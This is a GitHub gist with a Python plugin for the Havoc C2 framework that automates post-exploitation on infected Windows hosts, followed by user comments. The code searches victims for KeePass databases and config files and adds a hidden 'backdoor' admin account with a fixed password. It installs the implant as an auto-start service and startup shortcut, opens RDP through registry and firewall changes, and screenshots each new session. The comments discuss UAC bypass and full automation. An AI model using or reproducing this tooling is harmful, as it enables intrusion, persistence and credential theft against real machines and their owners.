Last active
July 16, 2024 11:01
-
-
Save p4p1/e24bca8407d69c8ea28d4bc9d423f85b to your computer and use it in GitHub Desktop.
ππππ
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # -*- coding: utf-8 -*- | |
| # Made by papi | |
| # Created on: Di 10 Okt 2023 01:54:42 CEST | |
| # auto_suite.py | |
| # Description: | |
| # A havoc extention to search for files inside of infected agents | |
| # Usage: | |
| # To use this script save it on your machine and add it to the script manager of Havoc | |
| # inside of: Scripts > Scripts Manager > Load Script | |
| import os | |
| import subprocess | |
| from shutil import which | |
| import havocui | |
| import havoc | |
| auto_search = havocui.Widget("Auto Search", True) | |
| auto_recon = havocui.Widget("Auto Recon", True) | |
| auto_persist = havocui.Widget("Auto Persist", True) | |
| auto_GUI = havocui.Widget("Auto rdp", True) | |
| demons = [] | |
| # auto search vars | |
| selecte_demon = None | |
| dir_to_search="C:\\\\" | |
| powershell = False | |
| batch = False | |
| text_files = False | |
| exe_files = False | |
| WebConf = False | |
| Keypass = False | |
| # auto persist vars | |
| local_payload_path = "/home/p4p1/payload/demon.x64.exe" | |
| remote_presist_path = "C:\\Windows\\Tasks\\" | |
| shell_custom_path = False | |
| shell_startup = False | |
| backdoor_user = False | |
| lnk_file = False | |
| service_running = False | |
| # auto recon vars | |
| auto_custompowershell = False | |
| auto_custompowershell_cmd = "" | |
| auto_bofbelt = False | |
| auto_password_policy = False | |
| auto_scrot = False | |
| # auto GUI vars | |
| username="backdoor" | |
| password="password123" | |
| domain="" | |
| dynamic_resolution=True | |
| admin_mode_gui=False | |
| disable_ssl_security=True | |
| set_firewall_and_task=True | |
| # ... Auto GUI section ... | |
| def set_username_gui(text): | |
| global username | |
| username = text | |
| def set_password_gui(text): | |
| global password | |
| password = text | |
| def set_domain_gui(text): | |
| global domain | |
| domain = text | |
| def set_dynamic_resultion(): | |
| global dynamic_resolution | |
| dynamic_resolution = not dynamic_resolution | |
| def set_ssl_security(): | |
| global disable_ssl_security | |
| disable_ssl_security = not disable_ssl_security | |
| def set_admin_mode(): | |
| global admin_mode_gui | |
| admin_mode_gui = not admin_mode_gui | |
| def set_set_firewall(): | |
| global set_firewall_and_task | |
| set_firewall_and_task = not set_firewall_and_task | |
| def open_autogui(): | |
| auto_GUI.clear() | |
| if which("xfreerdp") == None: | |
| auto_GUI.addLabel("<h3 style='color:#ff0000'>You are missing the XFREERDP package please install it to use this functionality</h3>") | |
| else: | |
| auto_GUI.addLabel("<h3 style='color:#bd93f9'>Settings of autordp command</h3>") | |
| auto_GUI.addLabel("<h6 style='color:#ff0000'>[!] means you need admin priv</h6>") | |
| auto_GUI.addLabel("<span style='color:#71e0cb'>username:</span>") | |
| auto_GUI.addLineedit(username, set_username_gui) | |
| auto_GUI.addLabel("<span style='color:#71e0cb'>password:</span>") | |
| auto_GUI.addLineedit(password, set_password_gui) | |
| auto_GUI.addLabel("<span style='color:#71e0cb'>domain:</span>") | |
| auto_GUI.addLineedit(domain, set_domain_gui) | |
| auto_GUI.addLabel("<span style='color:#71e0cb'>options:</span>") | |
| auto_GUI.addCheckbox("dynamic resolution", set_dynamic_resultion, dynamic_resolution) | |
| auto_GUI.addCheckbox("dissable ssl", set_ssl_security, disable_ssl_security) | |
| auto_GUI.addCheckbox("admin mode", set_admin_mode, admin_mode_gui) | |
| auto_GUI.addCheckbox("[!] add firewall rule and activate rdp (remote machine)", set_set_firewall, set_firewall_and_task) | |
| auto_GUI.setSmallTab() | |
| def run_autogui(demonID, *param): | |
| TaskID : str = None | |
| demon : Demon = None | |
| cmd = "" | |
| demon = havoc.Demon(demonID) | |
| print(domain) | |
| if domain != "": | |
| cmd = "bash -c \"yes | xfreerdp /u:%s\\%s /p:%s /v:%s" % (domain, username, password, demon.InternalIP) | |
| else: | |
| cmd = "bash -c \"yes | xfreerdp /u:%s /p:%s /v:%s" % (username, password, demon.InternalIP) | |
| if disable_ssl_security: | |
| cmd += " /tls-seclevel:0" | |
| if dynamic_resolution: | |
| cmd += " /dynamic-resolution" | |
| if admin_mode_gui: | |
| cmd += " /admin" | |
| cmd += "\"" | |
| TaskID = demon.ConsoleWrite(demon.CONSOLE_TASK, "Running: %s" % cmd ) | |
| if set_firewall_and_task: | |
| demon.Command(TaskID, "shell reg add \"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f") | |
| demon.Command(TaskID, "shell netsh advfirewall firewall set rule group=\"remote desktop\" new enable=yes") | |
| subprocess.Popen(cmd, shell=True) | |
| return TaskID | |
| # ... Auto Search section... | |
| def set_directory(text): | |
| global dir_to_search | |
| dir_to_search = text | |
| def slct_powershell(): | |
| global powershell | |
| powershell = not powershell | |
| def slct_batch(): | |
| global batch | |
| batch = not batch | |
| def slct_exe(): | |
| global exe_files | |
| exe_files = not exe_files | |
| def slct_text(): | |
| global text_files | |
| text_files = not text_files | |
| def slct_webconf(): | |
| global WebConf | |
| WebConf = not WebConf | |
| def slct_Key(): | |
| global Keypass | |
| Keypass = not Keypass | |
| def select_widget(num): | |
| global powershell | |
| global selecte_demon | |
| global demons | |
| if num != 0: | |
| print("help me....") | |
| selecte_demon = havoc.Demon(demons[num - 1]) | |
| def run_auto_search(): | |
| global powershell | |
| global selecte_demon | |
| global text_files | |
| global WebConf | |
| global Keypass | |
| global batch | |
| global exe_files | |
| global dir_to_search | |
| if selecte_demon is None: | |
| havocui.errormessage("You have not selected a demon! Please select one or start infecting machines if none are present in the drop down.") | |
| return | |
| TaskID = selecte_demon.ConsoleWrite( selecte_demon.CONSOLE_TASK, "Tasked demon to Find files" ) | |
| if powershell: | |
| selecte_demon.Command(TaskID, "powershell \"Get-ChildItem -Path %s -Filter *.ps1 -Recurse\"" % dir_to_search) | |
| if batch: | |
| selecte_demon.Command(TaskID, "powershell \"Get-ChildItem -Path %s -Filter *.bat -Recurse\"" % dir_to_search) | |
| if text_files: | |
| selecte_demon.Command(TaskID, "powershell \"Get-ChildItem -Path %s -Filter *.txt -Recurse\"" % dir_to_search) | |
| if WebConf: | |
| selecte_demon.Command(TaskID, "powershell \"Get-ChildItem -Path %s -Filter *web.config -Recurse\"" % dir_to_search) | |
| if Keypass: | |
| selecte_demon.Command(TaskID, "powershell \"Get-ChildItem -Path %s -Filter *.kdbx -Recurse\"" % dir_to_search) | |
| if exe_files: | |
| selecte_demon.Command(TaskID, "powershell \"Get-ChildItem -Path %s -Filter *.exe -Recurse\"" % dir_to_search) | |
| return TaskID | |
| def open_autosearch(): | |
| auto_search.clear() | |
| global demons | |
| demons = havoc.GetDemons() | |
| auto_search.addLabel("<h3 style='color:#bd93f9'>Select a demon to search files on</h3>") | |
| auto_search.addCombobox(select_widget, "select demon", *demons) | |
| auto_search.addLabel("<span style='color:#71e0cb'>Folder to start search:</span>") | |
| auto_search.addLineedit(dir_to_search, set_directory) | |
| auto_search.addLabel("<span style='color:#71e0cb'>File types:</span>") | |
| auto_search.addCheckbox("powershell files (*.ps1)", slct_powershell, powershell) | |
| auto_search.addCheckbox("batch files (*.bat)", slct_batch, batch) | |
| auto_search.addCheckbox("text files (*.txt)", slct_text, text_files) | |
| auto_search.addCheckbox("web.config files (*web.config)", slct_webconf, WebConf) | |
| auto_search.addCheckbox("KeePass Database files (*.kdbx)", slct_Key, Keypass) | |
| auto_search.addCheckbox("Executable files (*.exe)", slct_exe, exe_files) | |
| auto_search.addButton("Start search!", run_auto_search) | |
| auto_search.setSmallTab() | |
| # ... Auto Persist section ... | |
| def set_payload_path(data): | |
| global local_payload_path | |
| local_payload_path = data | |
| def set_rem_payload_path(data): | |
| global remote_presist_path | |
| remote_presist_path = data | |
| def slct_user_startup(): | |
| global shell_startup | |
| shell_startup = not shell_startup | |
| def slct_backdoor_user(): | |
| global backdoor_user | |
| backdoor_user = not backdoor_user | |
| def slct_service_running(): | |
| global service_running | |
| service_running = not service_running | |
| def slct_lnk_file(): | |
| global lnk_file | |
| lnk_file = not lnk_file | |
| def run_persist(): | |
| global selecte_demon | |
| global local_payload_path | |
| global shell_startup | |
| if selecte_demon is None: | |
| havocui.errormessage("You have not selected a demon! Please select one or start infecting machines if none are present in the drop down.") | |
| return | |
| TaskID = selecte_demon.ConsoleWrite( selecte_demon.CONSOLE_TASK, "Tasked demon to persist itself" ) | |
| if shell_startup: | |
| selecte_demon.Command(TaskID, "powershell \"[Environment]::GetFolderPath([Environment+SpecialFolder]::CommonStartup) | cd\"") | |
| selecte_demon.Command(TaskID, "upload %s" % local_payload_path) | |
| if backdoor_user: | |
| selecte_demon.Command(TaskID, "shell net user backdoor password123 /add") | |
| selecte_demon.Command(TaskID, "shell net localgroup \"Administrators\" backdoor /add") | |
| selecte_demon.Command(TaskID, "shell net localgroup \"Remote Desktop Users\" backdoor /add") | |
| if service_running: | |
| selecte_demon.Command(TaskID, "cd %s" % remote_presist_path) | |
| selecte_demon.Command(TaskID, "upload %s" % local_payload_path) | |
| selecte_demon.Command(TaskID, "shell sc create AutoSuite binPath=\"%s\\demon.x64.exe\" start=auto" % remote_presist_path) | |
| selecte_demon.Command(TaskID, "shell sc start AutoSuite") | |
| if lnk_file: | |
| selecte_demon.Command(TaskID, "powershell (New-Object -ComObject WScript.Shell).CreateShortcut('file.lnk').TargetPath = '%s\\demon.x64.exe';(New-Object -ComObject WScript.Shell).CreateShortcut('file.lnk').Save()" % remote_presist_path) | |
| return TaskID | |
| def open_autopersist(): | |
| auto_persist.clear() | |
| global demons | |
| demons = havoc.GetDemons() | |
| auto_persist.addLabel("<h3 style='color:#bd93f9'>Select a demon to set persistance on</h3>") | |
| auto_persist.addCombobox(select_widget, "select demon", *demons) | |
| auto_persist.addLabel("<span style='color:#71e0cb'>Path of payload on attacking end:</span>") | |
| auto_persist.addLineedit(local_payload_path, set_payload_path) | |
| auto_persist.addLabel("<span style='color:#71e0cb'>Path of payload on victim end:</span>") | |
| auto_persist.addLineedit(remote_presist_path, set_rem_payload_path) | |
| auto_persist.addLabel("<span style='color:#71e0cb'>Persistance type:</span>") | |
| auto_persist.addCheckbox("shell:startup", slct_user_startup, shell_startup) | |
| auto_persist.addCheckbox("backdoor user", slct_backdoor_user, backdoor_user) | |
| auto_persist.addCheckbox("backdoor service", slct_service_running, service_running) | |
| auto_persist.addCheckbox("link file in current folder", slct_lnk_file, lnk_file) | |
| auto_persist.addButton("Persist!", run_persist) | |
| auto_persist.setSmallTab() | |
| # ... Auto recon section ... | |
| def slct_bofbelt(): | |
| global auto_bofbelt | |
| auto_bofbelt = not auto_bofbelt | |
| def run_bofbelt(identifier): | |
| demon = havoc.Demon(identifier) | |
| TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, "Tasked demon to auto-run bofbelt" ) | |
| demon.Command(TaskID, "bofbelt") | |
| def slct_scrot(): | |
| global auto_scrot | |
| auto_scrot = not auto_scrot | |
| def run_scrot(identifier): | |
| demon = havoc.Demon(identifier) | |
| TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, "Tasked demon to auto-run screenshot" ) | |
| demon.Command(TaskID, "screenshot") | |
| def slct_pwpolicy(): | |
| global auto_password_policy | |
| auto_password_policy = not auto_password_policy | |
| def run_pwpolicy(identifier): | |
| demon = havoc.Demon(identifier) | |
| TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, "Tasked demon to auto-run get_password_policy" ) | |
| demon.Command(TaskID, "get_password_policy") | |
| def run_custpowershell(identifier): | |
| global auto_custompowershell_cmd | |
| demon = havoc.Demon(identifier) | |
| TaskID = demon.ConsoleWrite( demon.CONSOLE_TASK, "Tasked demon to auto-run get_password_policy" ) | |
| demon.Command(TaskID, "powershell \"%s\"" % auto_custompowershell_cmd) | |
| def set_powershell(text): | |
| global auto_custompowershell | |
| global auto_custompowershell_cmd | |
| if len(text) > 0: | |
| auto_custompowershell = True | |
| auto_custompowershell_cmd = text | |
| def save_autorecon(): | |
| global auto_bofbelt | |
| global auto_password_policy | |
| global auto_scrot | |
| global auto_custompowershell | |
| event = havoc.Event("events") | |
| if auto_bofbelt: | |
| event.OnNewSession(run_bofbelt) | |
| if auto_password_policy: | |
| event.OnNewSession(run_pwpolicy) | |
| if auto_scrot: | |
| event.OnNewSession(run_scrot) | |
| if auto_custompowershell: | |
| event.OnNewSession(run_custpowershell) | |
| auto_recon.addLabel("<h3 style='color:#bd93f9'>Run commands on new session</h3>") | |
| auto_recon.addLabel("<span style='color:#71e0cb'>Pre-defined commands:</span>") | |
| auto_recon.addCheckbox("bofbelt (seat belt recon tool)", slct_bofbelt, auto_bofbelt) | |
| auto_recon.addCheckbox("get_password_policy", slct_pwpolicy, auto_password_policy) | |
| auto_recon.addCheckbox("screenshot", slct_scrot, auto_scrot) | |
| auto_recon.addLabel("<span style='color:#71e0cb'>Custom powershell command:</span>") | |
| auto_recon.addLineedit("Get-ChildItem...", set_powershell) | |
| auto_recon.addButton("Save", save_autorecon) | |
| def open_autorecon(): | |
| auto_recon.setSmallTab() | |
| if not which("xfreerdp") == None: | |
| havoc.RegisterCommand( run_autogui, "", "autordp", "Connect to the machine using xfreerdp.", 0, "", "" ) | |
| save_autorecon() | |
| havocui.createtab("Auto Suite", "Auto search", open_autosearch, "Auto recon", open_autorecon, "Auto persist", open_autopersist, "Auto rdp", open_autogui) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Thanks for answer! Wish a good luck with OSEP. Me too in wait for havoc rewrite.
Seems i was miss attacking/attackers machine - repeat it with selfhosted payload (both methods), receive only Access Denied for User.
(Set-ItemProperty -Path 'HKCU:\Soft.... Still work for User with no Admin or some other privs like selfimpersonate , its win 10 test machine with account on one drive, so i see that many of methods and tool not work on that env) -but maybe that technique deserve to be in
Cause low code, i can just advice some logic that possible may be helpful -
Something like individual trays/chains with checkboxes for 1. New User 2. New Admin 3. Manual .
Payload - Target / Stored / Remote + to add files in chain, for dll sideloading etc .
Output folder .
Elevate/Uac - 1 Technique 2 Path https://github.com/icyguider/UAC-BOF-Bonanza there is havoc script / potatos
And maybe add a option to add commands (like recon, or integrate him), even between steps (yep oneliners is cool , but sometimes syntax broke all) , and not only powershell command on start, like extensions/modules commands - for ex run "uac-bypass elevatedcom file.exe" "dll spawn explorer exe" .
So if rightly setup unpriv and priv chains it might be fully auto c2)
(upd. i found session.Elevated and Session.OS in havoc Packager.cc and Elevated / "Elevated": Agent.Info.Elevated in demons.go, hope it will help to identify privileges on demon initial to understand what commands list send to it) - will try to implement in py (upd. -fail seems havoc dont understand that , or i code wrong. Panel can understand what kind of demon/user it is .. so possible script can.)